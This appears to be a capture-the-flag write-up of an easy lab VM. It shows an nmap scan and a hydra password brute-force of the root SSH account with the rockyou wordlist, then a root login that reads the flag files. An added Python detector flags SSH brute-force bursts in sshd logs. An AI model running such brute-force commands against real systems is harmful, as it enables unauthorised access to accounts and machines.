ℹ️ This VM is VERY easy to pwn. I wrote this report out of a chronicler’s duty.

Enumeration and priv esc

I started with the standard path of enumerating services.

$ nmap -sT target.local

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

I had direct access to the http service, which was running a basic placeholder website, and to ssh, which would probably be useful pretty soon.

The placeholder said:

<body>
  Dont Overthink. Really, Its simple.
  <!-- Trust me -->
</body>

We’ll see about that 😉

From the 404 page I learned it’s served by nginx.

Given the webpage said explicitly not to overthink the process (and the fact that gobuster found nothing), I thought of bruteforcing the root password using hydra 🤷‍♂

$ hydra -l root -P /usr/share/wordlists/rockyou.txt.gz ssh://target.local

# ...
[22][ssh] host: target.local   login: root   password: simple

Guess it really was that simple.
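What a run like this looks like from the server side, as an added example that is not part of the original write-up: a small detector over sshd password-auth log lines that flags a burst of failures from one source and, more importantly, a successful login that follows the burst. The log lines, IP addresses, threshold and window are constructed assumptions; only the host name `gift` and the `root` account come from the page.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# OpenSSH password-auth syslog lines: "Failed|Accepted password for <user> from <ip> port <n> ssh2"
LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+")

# Constructed sample log (not captured from the VM): six failures, then a hit.
SAMPLE = [f"Mar 10 12:00:0{i} gift sshd[120{i}]: Failed password for root "
          f"from 192.0.2.10 port 4000{i} ssh2" for i in range(6)] + [
    "Mar 10 12:00:06 gift sshd[1206]: Accepted password for root from 192.0.2.10 port 40006 ssh2",
    # A user mistyping once and then logging in must not alert.
    "Mar 10 12:05:00 gift sshd[1300]: Failed password for alice from 198.51.100.7 port 50000 ssh2",
    "Mar 10 12:05:09 gift sshd[1301]: Accepted password for alice from 198.51.100.7 port 50001 ssh2",
]

def parse(line, year=2024):
    """Return (timestamp, result, user, ip) or None; syslog omits the year."""
    m = LINE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]

def detect(lines, threshold=5, window=timedelta(minutes=1)):
    """Alert on >= threshold failures per (ip, user) in window, and on a success after one."""
    fails, alerts, flagged = defaultdict(deque), [], set()
    for rec in filter(None, map(parse, lines)):
        ts, result, user, ip = rec
        q = fails[(ip, user)]
        while q and ts - q[0] > window:   # drop failures older than the window
            q.popleft()
        if result == "Failed":
            q.append(ts)
            if len(q) >= threshold and (ip, user) not in flagged:
                flagged.add((ip, user))
                alerts.append(("burst", ip, user, len(q)))
        elif len(q) >= threshold:          # Accepted right after a burst: likely guessed password
            alerts.append(("success_after_burst", ip, user, len(q)))
            q.clear()
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```
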

Pwned

$ ssh root@target.local
root@target.local's password:

IM AN SSH SERVER
gift:~# ls

root.txt  user.txt

gift:~# cat root.txt user.txt
# redacted

Pwned.